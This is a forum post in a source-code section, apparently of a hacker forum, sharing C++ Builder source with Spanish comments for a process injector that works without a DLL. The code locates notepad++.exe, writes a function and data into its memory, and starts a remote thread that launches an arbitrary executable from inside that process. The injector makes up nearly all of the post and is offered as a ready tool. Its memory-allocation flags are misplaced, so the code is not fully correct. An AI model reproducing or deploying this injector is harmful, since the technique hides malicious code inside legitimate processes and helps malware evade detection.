Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked Inyeccion sin DLL [C++ XE2] [Fakedo0r]

Expermicid

By INACTIVE Expermicid
in Source Code

 Share

Recommended Posts

Expermicid Aspiring Hacker

INACTIVE Expermicid

Posted
Posted (edited)

[lenguaje=delphi]//******************************************************************************

//* AUTOR: Fakedo0r .:PD-TEAM:.

//* FECHA: 01.09.2012

//* CORREO: [email protected]

//* BLOG: Sub-Soul.blogspot.com / Sub-Soul.com

//* USO: Injector;

//******************************************************************************

//******************************************************************************

//#INCLUDE

//******************************************************************************

#include

//******************************************************************************

//DECLARACION DE FUNCIONES / PROCEDIMIENTOS

//******************************************************************************

LPVOID AllocAndCopyMem(HANDLE hProcess, const LPVOID lpBuffer,

SIZE_T iBufferSize);

 

typedef HINSTANCE(WINAPI *__ShellExecute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR,

LPCTSTR, int);

//******************************************************************************

//DECLARACION DE ESTRUCTURAS

//******************************************************************************

struct T_INJECT {

__ShellExecute __ShlExe;

wchar_t cExe[MAX_PATH];

wchar_t cOper[MAX_PATH];

};

//******************************************************************************

//<--- LA FUNCION QUE VAMOS A INYECTAR --->

//******************************************************************************

void Injected(T_INJECT *tInj) {

 

tInj->__ShlExe(0, tInj->cOper, tInj->cExe, NULL, NULL, 1);

}

//******************************************************************************

//<--- LA FUNCION QUE OPERA LA INYECCION --->

//******************************************************************************

void Injector() {

 

DWORD dwPID = 0;

DWORD dwExitCode = 0;

UINT uTamFun = 0;

HANDLE hProcess;

HANDLE hThread;

HMODULE hModule;

 

PROCESSENTRY32 tProcEntry;

T_INJECT tInj;

 

hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

tProcEntry.dwSize = sizeof(PROCESSENTRY32);

 

if (Process32First(hProcess, &tProcEntry)) {

do {

if (String(tProcEntry.szExeFile) == "notepad++.exe") {

dwPID = tProcEntry.th32ProcessID;

break;

}

}

while (Process32Next(hProcess, &tProcEntry));

}

 

CloseHandle(hProcess);

 

// obtenemos el handle del proceso

hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, dwPID);

 

// obtenemos el puntero del api

hModule = LoadLibrary(UnicodeString("Shell32.dll").w_str());

tInj.__ShlExe = (__ShellExecute)(DWORD) GetProcAddress(hModule,

"ShellExecuteW");

 

// copiamos los datos en las variables

lstrcpy(tInj.cExe, L"D:\\1.exe");

lstrcpy(tInj.cOper, L"open");

 

// reservamos y copiamos nuestra estructura en la memoria

LPVOID lpStruct = AllocAndCopyMem(hProcess, &tInj, sizeof(T_INJECT));

 

// calculamos el tamaño de nuestra funcion

uTamFun = (UINT)Injector - (UINT)Injected;

 

// reservamos y copiamos nuestra funcion en la memoria

LPVOID lpEsp = AllocAndCopyMem(hProcess, &Injected, uTamFun);

 

// creamos el hilo remoto

hThread = CreateRemoteThread(hProcess, NULL, 0,

(LPTHREAD_START_ROUTINE)lpEsp, lpStruct, 0, NULL);

 

if (hThread != 0) {

// esperamos hasta que se cree el hilo

WaitForSingleObject(hThread, INFINITE);

// obtenemos el estado de terminacion del hilo

GetExitCodeThread(hThread, &dwExitCode);

// liberamos el handle del hilo creado

CloseHandle(hThread);

// liberamos el espacio en el proceso

VirtualFreeEx(hProcess, lpStruct, 0, MEM_RELEASE);

VirtualFreeEx(hProcess, lpEsp, 0, MEM_RELEASE);

}

 

// liberamos el handle del proceso

CloseHandle(hProcess);

}

//******************************************************************************

//<--- RESERVA ESPACIO Y ESCRIBE EN LA MEMORIA --->

//******************************************************************************

LPVOID AllocAndCopyMem(HANDLE hProcess, LPVOID lpBuffer, SIZE_T iBufferSize) {

// reservamos espacio en la memoria

LPVOID lpRemAlloc = VirtualAllocEx(hProcess, 0, iBufferSize,

MEM_COMMIT | PAGE_READWRITE, PAGE_EXECUTE_READWRITE);

// escribimos en la memoria

WriteProcessMemory(hProcess, lpRemAlloc, lpBuffer, iBufferSize, NULL);

 

return lpRemAlloc;

} [/lenguaje]

Edited by Expermicid
Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.